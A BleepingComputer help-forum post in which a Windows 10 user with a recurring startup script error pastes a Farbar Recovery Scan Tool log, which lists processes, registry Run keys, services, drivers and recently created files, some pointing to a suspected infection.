Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

script error pops up everytime my windows10 starts! (includes pic)


  • Please log in to reply
1 reply to this topic

#1 SinatheSaint

SinatheSaint

  • Members
  • 3 posts
  • OFFLINE
  •  
  • Local time:12:48 PM

Posted 11 September 2016 - 06:20 AM

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 31-08-2016
Ran by Sina (administrator) on SINATHESAINT (11-09-2016 15:27:44)
Running from C:\Users\Sina\Downloads\Programs
Loaded Profiles: Sina (Available Profiles: Sina)
Platform: Microsoft Windows 10 Home Version 1607 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(IObit) C:\Program Files\IObit\Advanced SystemCare Ultimate\ASCAvSvc.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare Ultimate\ASCService.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(ASUSTek Computer Inc.) C:\Program Files\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(ASUS) C:\Program Files\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ASUSTek Computer Inc.) C:\Program Files\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe
(Intel Corporation) C:\Windows\System32\DptfParticipantProcessorService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmService.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyCriticalService.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(IObit) C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe
(ASUSTek Computer Inc.) C:\Program Files\ASUS\ATK Package\ATK Hotkey\HControl.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare Ultimate\Monitor.exe
(ASUSTek Computer INC.) C:\ProgramData\AsTouchPanel\AsPatchTouchPanel.exe
(ASUSTek Computer INC.) C:\Program Files\ASUS\ASUS AC Reminder\ACReminderSrv.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(ASUSTek Computer Inc.) C:\Program Files\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(ASUSTek Computer Inc.) C:\Program Files\ASUS\ATK Package\ATK Media\DMedia.exe
(Microsoft Corporation) C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.7.113.0_x86__kzf8qxf38zg5c\SkypeHost.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(AsusTek) C:\Program Files\ASUS\ASUS Smart Gesture\AsTPCenter\x86\AsusTPLoader.exe
(AsusTek) C:\Program Files\ASUS\ASUS Smart Gesture\AsTPCenter\x86\AsusTPCenter.exe
(AsusTek) C:\Program Files\ASUS\ASUS Smart Gesture\AsTPCenter\x86\AsusTPHelper.exe
(ASUSTeK Computer Inc.) C:\Program Files\ASUS\ASUS Smart Gesture\AsTPCenter\x86\AsusSGPlusBTServer.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Intel Corporation) C:\Windows\System32\DptfPolicyLpmServiceHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\AP\RtkNGUI.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare Ultimate\ASCTray.exe
(Microsoft Corporation) C:\Windows\System32\regsvr32.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
() C:\Users\Sina\AppData\Local\Okscics\tmp65F1.exe
(IObit) C:\Program Files\IObit\IObit Uninstaller\UninstallMonitor.exe
(IObit) C:\Program Files\IObit\Advanced SystemCare Ultimate\ASC.exe
(Intel Corporation) C:\Program Files\Intel\TXE Components\DAL\jhi_service.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(IObit) C:\Program Files\IObit\Smart Defrag\SmartDefrag.exe
(Tonec Inc.) C:\Program Files\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files\Internet Download Manager\IEMonitor.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneMusic_3.6.23981.0_x86__8wekyb3d8bbwe\Music.UI.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneVideo_3.6.23941.0_x86__8wekyb3d8bbwe\Video.UI.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_11607.1001.51.0_x86__8wekyb3d8bbwe\WinStore.Mobile.exe
(IObit) C:\Program Files\IObit\Smart Defrag\sdproxy.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\System32\backgroundTaskHost.exe

==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\WINDOWS\system32\DptfPolicyLpmServiceHelper.exe [81360 2014-01-22] (Intel Corporation)
HKLM\...\Run: [ASUSPRP] => C:\Program Files\ASUS\APRP\APRP.EXE [3216032 2013-12-14] (ASUSTek Computer Inc.)
HKLM\...\Run: [RtkNGUI] => C:\Program Files\Realtek\Audio\AP\RtkNGUI.exe [2912256 2014-01-17] (Realtek Semiconductor)
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKU\S-1-5-21-2825370636-608562156-754786092-1001\...\Run: [IDMan] => C:\Program Files\Internet Download Manager\IDMan.exe [3952696 2016-09-02] (Tonec Inc.)
HKU\S-1-5-21-2825370636-608562156-754786092-1001\...\Run: [Advanced SystemCare Ultimate] => C:\Program Files\IObit\Advanced SystemCare Ultimate\ASCTray.exe [2430240 2016-06-07] (IObit)
HKU\S-1-5-21-2825370636-608562156-754786092-1001\...\Run: [Okscics] => C:\Users\Sina\AppData\Local\Okscics\tmp65F1.exe [239493 2016-09-10] ()
HKU\S-1-5-21-2825370636-608562156-754786092-1001\...\Run: [YkkPack] => C:\Windows\System32\regsvr32.exe C:\Users\Sina\AppData\Local\Okscics\gsnsyjnm.dll
HKU\S-1-5-21-2825370636-608562156-754786092-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\NFSDIG~3.SCR [188644 2009-11-07] ()
HKU\S-1-5-21-2825370636-608562156-754786092-1001\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\Sina\AppData\Local\Okscics\kkpxymnr.dll ATTENTION
ShellIconOverlayIdentifiers: [   IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files\Internet Download Manager\IDMShellExt.dll [2015-08-14] (Tonec Inc.)
Startup: C:\Users\Sina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\192b.lnk [2016-09-10]
ShortcutTarget: 192b.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 217.218.155.155 217.218.127.127
Tcpip\..\Interfaces\{c474ed8e-9568-4f55-b7ad-1a49d291e15f}: [DhcpNameServer] 13.5.0.88
Tcpip\..\Interfaces\{fed3463c-c060-4d29-9a1a-eea75e4a7ef5}: [DhcpNameServer] 217.218.155.155 217.218.127.127
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-2825370636-608562156-754786092-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://asus13.msn.com/?pc=ASJB
SearchScopes: HKU\S-1-5-21-2825370636-608562156-754786092-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D091116-A9FF51A7D86&form=CONBDF&conlogo=CT3335371&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2825370636-608562156-754786092-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D091116-A9FF51A7D86&form=CONBDF&conlogo=CT3335371&q={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files\Internet Download Manager\IDMIECC.dll [2016-07-13] (Internet Download Manager, Tonec Inc.)
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> C:\Program Files\IObit\IObit Uninstaller\UninstallExplorer.dll [2015-11-12] (IObit)
FireFox:
========
FF Plugin: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files\Intel\TXE Components\IPT\npIntelWebAPIIPT.dll [2013-07-13] (Intel Corporation)
FF Plugin: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files\Intel\TXE Components\IPT\npIntelWebAPIUpdater.dll [2013-07-13] (Intel Corporation)
FF HKU\S-1-5-21-2825370636-608562156-754786092-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Sina\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Sina\AppData\Roaming\IDM\idmmzcc5 [2016-09-11] [not signed]
FF HKU\S-1-5-21-2825370636-608562156-754786092-1001\...\SeaMonkey\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Program Files\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files\Internet Download Manager\idmmzcc2.xpi [2016-08-03]
Chrome:
=======
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files\Internet Download Manager\IDMGCExt.crx [2016-06-09]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdvancedSystemCareService9; C:\Program Files\IObit\Advanced SystemCare Ultimate\ASCService.exe [456480 2016-05-30] (IObit)
R2 ASCAntivirusSrv; C:\Program Files\IObit\Advanced SystemCare Ultimate\ascavsvc.exe [1858336 2016-07-08] (IObit)
R2 AsHidService; C:\Program Files\ASUS\ATK Package\ATK Hotkey\AsHidSrv.exe [103224 2013-09-09] (ASUSTek Computer Inc.)
R2 ASLDRService; C:\Program Files\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe [115512 2014-02-18] (ASUSTek Computer Inc.)
R2 ATKGFNEXSrv; C:\Program Files\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe [96896 2011-11-22] (ASUS)
S2 BcmBtRSupport; C:\WINDOWS\system32\BtwRSupportService.exe [1677016 2014-05-28] (Broadcom Corporation.)
S3 cphs; C:\WINDOWS\system32\IntelCpHeciSvc.exe [299488 2016-05-03] (Intel Corporation)
R2 DptfParticipantProcessorService; C:\WINDOWS\system32\DptfParticipantProcessorService.exe [83920 2014-01-22] (Intel Corporation)
R2 DptfPolicyCriticalService; C:\WINDOWS\system32\DptfPolicyCriticalService.exe [96720 2014-01-22] (Intel Corporation)
R2 DptfPolicyLpmService; C:\WINDOWS\system32\DptfPolicyLpmService.exe [90576 2014-01-22] (Intel Corporation)
R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [292832 2016-05-03] (Intel Corporation)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [586752 2013-07-02] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [637912 2013-07-02] (Intel® Corporation)
R2 jhi_service; C:\Program Files\Intel\TXE Components\DAL\jhi_service.exe [168216 2014-01-15] (Intel Corporation)
R2 LiveUpdateSvc; C:\Program Files\IObit\LiveUpdate\LiveUpdate.exe [2960672 2016-07-20] (IObit)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [271496 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [84928 2016-07-16] (Microsoft Corporation)
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 ASMMAP; C:\Program Files\ASUS\ATK Package\ATKGFNEX\ASMMAP.sys [13880 2009-07-03] (ASUS)
S3 AsusHID; C:\WINDOWS\System32\drivers\AsusHID.sys [68888 2014-04-09] (ASUS Corporation)
R3 AsusSGDrv; C:\WINDOWS\system32\DRIVERS\AsusSGDrv.sys [118264 2015-12-14] (ASUS Corporation)
R1 ATKWMIACPIIO; C:\Program Files\ASUS\ATK Package\ATK WMIACPI\atkwmiacpi.sys [17720 2013-07-03] (ASUSTek Computer Inc.)
R3 BCMSDH43XX; C:\WINDOWS\system32\DRIVERS\bcmdhd63.sys [304344 2014-05-28] (Broadcom Corp)
R3 BthMini; C:\WINDOWS\System32\drivers\BTHMINI.sys [23040 2016-08-20] (Microsoft Corporation)
S3 btwampfl; C:\WINDOWS\System32\drivers\btwampfl.sys [144600 2014-05-28] (Broadcom Corporation.)
R3 BtwSerialBus; C:\WINDOWS\System32\drivers\BtwSerialBus.sys [130776 2014-05-28] (Broadcom Corporation.)
R3 camera; C:\WINDOWS\system32\DRIVERS\camera.sys [345088 2013-12-02] (Intel Corporation)
R3 CM3218x; C:\WINDOWS\System32\drivers\WUDFRd.sys [161280 2016-07-16] (Microsoft Corporation)
R3 CPLMACPI; C:\WINDOWS\System32\drivers\CPLMACPI.sys [16488 2013-09-06] (Capella Microsystems, Inc.)
S3 DptfDevAmbient; C:\WINDOWS\System32\drivers\DptfDevAmbient.sys [44496 2014-01-22] (Intel Corporation)
R3 DptfDevDBPT; C:\WINDOWS\System32\drivers\DptfDevPower.sys [25552 2014-01-22] (Intel Corporation)
R3 DptfDevDisplay; C:\WINDOWS\System32\drivers\DptfDevDisplay.sys [28112 2014-01-22] (Intel Corporation)
R3 DptfDevGen; C:\WINDOWS\System32\drivers\DptfDevGen.sys [36304 2014-01-22] (Intel Corporation)
R3 DptfDevProc; C:\WINDOWS\System32\drivers\DptfDevProc.sys [80848 2014-01-22] (Intel Corporation)
R3 DptfManager; C:\WINDOWS\System32\drivers\DptfManager.sys [181712 2014-01-22] (Intel Corporation)
R3 GPIO; C:\WINDOWS\System32\drivers\iaiogpioe.sys [23552 2013-12-30] (Intel Corporation)
R3 GpioVirtual; C:\WINDOWS\System32\drivers\iaiogpiovirtual.sys [16896 2013-12-30] (Intel Corporation)
R2 gzflt; C:\WINDOWS\System32\DRIVERS\gzflt.sys [169992 2014-10-22] (BitDefender LLC)
R3 HIDSwitch; C:\WINDOWS\System32\drivers\AsHIDSwitch.sys [17720 2013-10-08] (ASUS)
R1 HssDRV6; C:\WINDOWS\system32\DRIVERS\hssdrv6.sys [39528 2015-09-19] (AnchorFree Inc.)
R3 iaioi2c; C:\WINDOWS\System32\drivers\iaioi2ce.sys [58368 2013-11-15] (Intel Corporation)
R3 iaiouart; C:\WINDOWS\System32\drivers\iaiouart.sys [87552 2013-12-30] (Intel Corporation)
S3 iaStorA; C:\WINDOWS\System32\drivers\iaStorA.sys [505192 2013-08-09] (Intel Corporation)
S3 intaud_WaveExtensible; C:\WINDOWS\system32\drivers\intelaud.sys [44016 2015-12-02] (Intel Corporation)
R3 IntelSST; C:\WINDOWS\system32\drivers\isstrtc.sys [254464 2013-12-30] (Intel® Corporation)
R3 INVN_MotionApps; C:\WINDOWS\System32\drivers\WUDFRd.sys [161280 2016-07-16] (Microsoft Corporation)
R3 iwdbus; C:\WINDOWS\System32\drivers\iwdbus.sys [35320 2015-12-02] (Intel Corporation)
R0 MBI; C:\WINDOWS\System32\drivers\MBI.sys [21456 2013-12-30] (Intel Corporation)
R3 MT9M114; C:\WINDOWS\System32\drivers\MT9M114.sys [38912 2013-12-02] (Intel Corporation)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [62976 2016-07-16] ()
R3 PMIC; C:\WINDOWS\System32\drivers\PMIC.sys [48128 2013-12-30] (Intel Corporation)
R3 rtii2sac; C:\WINDOWS\system32\DRIVERS\rtii2sac.sys [169176 2014-03-14] (Realtek Semiconductor Corp.)
R0 SmartDefragDriver; C:\WINDOWS\System32\Drivers\SmartDefragDriver.sys [18800 2016-03-22] (IObit)
R3 Trufos; C:\WINDOWS\System32\DRIVERS\TRUFOS.sys [408280 2014-10-15] (BitDefender S.R.L.)
R3 TXEI; C:\WINDOWS\System32\drivers\TXEI.sys [75792 2014-02-26] (Intel Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [37912 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [244576 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [100192 2016-07-16] (Microsoft Corporation)
R3 WUDFWpdMtp; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [161280 2016-07-16] (Microsoft Corporation)
S3 taphss6; \SystemRoot\System32\drivers\taphss6.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-09-11 15:20 - 2016-09-11 15:27 - 00000000 ___DC C:\FRST
2016-09-11 14:37 - 2016-09-11 14:37 - 00000000 __HDC C:\OneDriveTemp
2016-09-11 14:18 - 2016-09-11 14:18 - 00001209 ____C C:\Users\Public\Desktop\Smart Defrag 5.lnk
2016-09-11 14:18 - 2016-09-11 14:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart Defrag
2016-09-11 14:18 - 2016-03-25 14:33 - 00111392 _____ (IObit) C:\WINDOWS\system32\IObitSmartDefragExtension.dll
2016-09-11 14:18 - 2016-03-22 11:02 - 00033192 _____ (IObit) C:\WINDOWS\system32\SmartDefragBootTime.exe
2016-09-11 14:18 - 2016-03-22 11:02 - 00018800 _____ (IObit) C:\WINDOWS\system32\Drivers\SmartDefragDriver.sys
2016-09-11 14:05 - 2016-09-11 14:05 - 42332160 _____ C:\WINDOWS\system32\config\SOFTWARE.iobit
2016-09-11 14:05 - 2016-09-11 14:05 - 00278528 _____ C:\WINDOWS\system32\config\DEFAULT.iobit
2016-09-11 14:05 - 2016-09-11 14:05 - 00069632 _____ C:\WINDOWS\system32\config\SAM.iobit
2016-09-11 14:05 - 2016-09-11 14:05 - 00032768 _____ C:\WINDOWS\system32\config\SECURITY.iobit
2016-09-11 14:04 - 2016-09-11 14:04 - 00000290 ____C C:\WINDOWS\Tasks\Uninstaller_SkipUac_Sina.job
2016-09-11 14:04 - 2016-09-11 14:04 - 00000000 ____D C:\ProgramData\Unknown
2016-09-11 13:58 - 2016-09-11 13:58 - 04997120 _____ C:\WINDOWS\system32\config\DRIVERS.iobit
2016-09-11 13:58 - 2016-09-11 13:58 - 00345360 _____ (Lavasoft Limited) C:\WINDOWS\system32\LavasoftTcpService.dll
2016-09-11 13:58 - 2016-09-11 13:58 - 00002944 _____ C:\WINDOWS\system32\LavasoftTcpServiceOff.ini
2016-09-11 13:55 - 2016-09-11 14:12 - 00000000 ____D C:\Program Files\TweakBit
2016-09-11 13:55 - 2016-09-11 13:58 - 00000000 ____D C:\ProgramData\TweakBit
2016-09-11 13:55 - 2016-09-11 13:55 - 00000000 ____D C:\ProgramData\MegaBackup Corp
2016-09-11 13:52 - 2016-09-11 13:53 - 00410344 ____C (TweakBit) C:\Users\Sina\Downloads\regsvr32.dll-repairkit.exe
2016-09-11 13:29 - 2016-09-11 13:29 - 00281676 _____ C:\WINDOWS\Minidump\091116-11843-01.dmp
2016-09-10 17:50 - 2016-09-11 12:25 - 00000000 ____D C:\Users\Sina\AppData\Local\YdzPack
2016-09-10 17:09 - 2016-09-10 17:09 - 00000000 ____D C:\Users\Sina\AppData\Roaming\e02a
2016-09-10 17:09 - 2016-09-10 17:09 - 00000000 ____D C:\Users\Sina\AppData\Local\4cff
2016-09-10 16:53 - 2016-09-10 17:52 - 00000000 ____D C:\Users\Sina\AppData\Local\Okscics
2016-09-10 13:54 - 2016-09-11 12:55 - 00000000 ___DC C:\Users\Sina\AppData\LocalLow\uTorrent
2016-09-10 13:54 - 2016-09-10 13:54 - 00033026 ____C C:\Users\Sina\Downloads\Suicide Squad 2016.torrent
2016-09-10 02:55 - 2016-09-10 02:55 - 00060303 ____C C:\Users\Sina\Downloads\[kat.cr]ac.dc.the.complete.studio.albums.1975.2014.vinyl.24.96.torrent
2016-09-08 16:03 - 2014-10-15 22:14 - 00408280 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
2016-09-08 16:00 - 2016-09-08 16:00 - 00000268 ____C C:\WINDOWS\Tasks\ASCU9_SkipUac_Sina.job
2016-09-08 15:59 - 2016-09-08 15:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare Ultimate
2016-09-08 15:42 - 2016-09-08 15:45 - 00000000 ____D C:\Users\Sina\AppData\Roaming\WinRAR
2016-09-08 15:40 - 2016-09-08 15:45 - 00000000 ____D C:\Users\Sina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-09-08 15:40 - 2016-09-08 15:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-09-08 15:39 - 2016-09-08 15:55 - 00000000 ____D C:\Program Files\WinRAR
2016-09-08 15:16 - 2016-09-08 15:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Uninstaller
2016-09-08 15:15 - 2016-09-08 15:15 - 00000000 ____D C:\ProgramData\{FD6F83C0-EC70-4581-8361-C70CD1AA4B98}
2016-09-03 21:36 - 2016-09-03 21:36 - 00000000 ____D C:\Users\Sina\AppData\Local\CrashRpt
2016-09-03 19:26 - 2016-08-20 10:04 - 01898848 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-09-03 19:26 - 2016-08-20 10:04 - 00782176 ____C (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-09-03 19:26 - 2016-08-20 10:04 - 00550752 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-09-03 19:26 - 2016-08-20 10:04 - 00342880 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-09-03 19:26 - 2016-08-20 10:02 - 00588640 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys
2016-09-03 19:26 - 2016-08-20 10:02 - 00023776 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-09-03 19:26 - 2016-08-20 09:46 - 02755584 ____C (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2016-09-03 19:26 - 2016-08-20 09:45 - 00034304 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-09-03 19:26 - 2016-08-20 09:44 - 00121344 ____C (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2016-09-03 19:26 - 2016-08-20 09:44 - 00014336 ____C (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL
2016-09-03 19:26 - 2016-08-20 09:43 - 00023040 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthMini.SYS
2016-09-03 19:26 - 2016-08-20 09:42 - 00201728 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys
2016-09-03 19:26 - 2016-08-20 09:40 - 00186368 ____C (Microsoft Corporation) C:\WINDOWS\system32\cdd.dll
2016-09-03 19:26 - 2016-08-20 09:40 - 00093696 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2016-09-03 19:26 - 2016-08-20 09:37 - 00822784 ____C (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-09-03 19:26 - 2016-08-20 09:36 - 00790528 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-09-03 19:26 - 2016-08-20 09:34 - 01375232 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2016-09-03 19:26 - 2016-08-20 09:34 - 00198656 ____C (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2016-09-03 19:26 - 2016-08-20 09:34 - 00184320 ____C (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-09-03 19:26 - 2016-08-20 09:31 - 00468992 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2016-09-03 19:26 - 2016-08-20 09:31 - 00360448 ____C (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-09-03 19:26 - 2016-08-20 09:30 - 19423232 ____C (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-09-03 19:26 - 2016-08-20 09:30 - 00141824 ____C (Windows ® Win 7 DDK provider) C:\WINDOWS\system32\DscCoreConfProv.dll
2016-09-03 19:26 - 2016-08-20 09:24 - 00806912 ____C (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
2016-09-03 19:26 - 2016-08-20 09:23 - 01220608 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-09-03 19:26 - 2016-08-20 09:21 - 06044672 ____C (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-09-03 19:26 - 2016-08-20 09:21 - 01992704 ____C (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-09-03 19:26 - 2016-08-20 09:21 - 01938432 ____C (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-09-03 19:26 - 2016-08-20 09:19 - 02999296 ____C (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-09-03 19:26 - 2016-08-20 09:19 - 01885696 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-09-03 19:26 - 2016-08-20 09:18 - 00582144 ____C (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-09-03 19:25 - 2016-08-27 14:07 - 00184832 ____C (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll
2016-09-03 19:25 - 2016-08-27 09:28 - 03893376 ____C (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-09-03 19:25 - 2016-08-27 09:28 - 00121368 ____C (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-09-03 19:25 - 2016-08-27 09:13 - 00022528 ____C (Microsoft Corporation) C:\WINDOWS\system32\encapi.dll
2016-09-03 19:25 - 2016-08-27 09:08 - 00181760 ____C (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2016-09-03 19:25 - 2016-08-27 09:07 - 00198144 ____C (Microsoft Corporation) C:\WINDOWS\system32\FSClient.dll
2016-09-03 19:25 - 2016-08-27 08:51 - 00503296 ____C (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-09-03 19:25 - 2016-08-20 10:56 - 00484584 ____C (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-09-03 19:25 - 2016-08-20 10:45 - 01144080 ____C (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2016-09-03 19:25 - 2016-08-20 10:19 - 00092000 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2016-09-03 19:25 - 2016-08-20 10:18 - 00887872 ____C (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-09-03 19:25 - 2016-08-20 10:18 - 00781464 ____C (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-09-03 19:25 - 2016-08-20 10:17 - 01064016 ____C (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-09-03 19:25 - 2016-08-20 10:17 - 00937496 ____C (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-09-03 19:25 - 2016-08-20 10:16 - 06016352 ____C (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
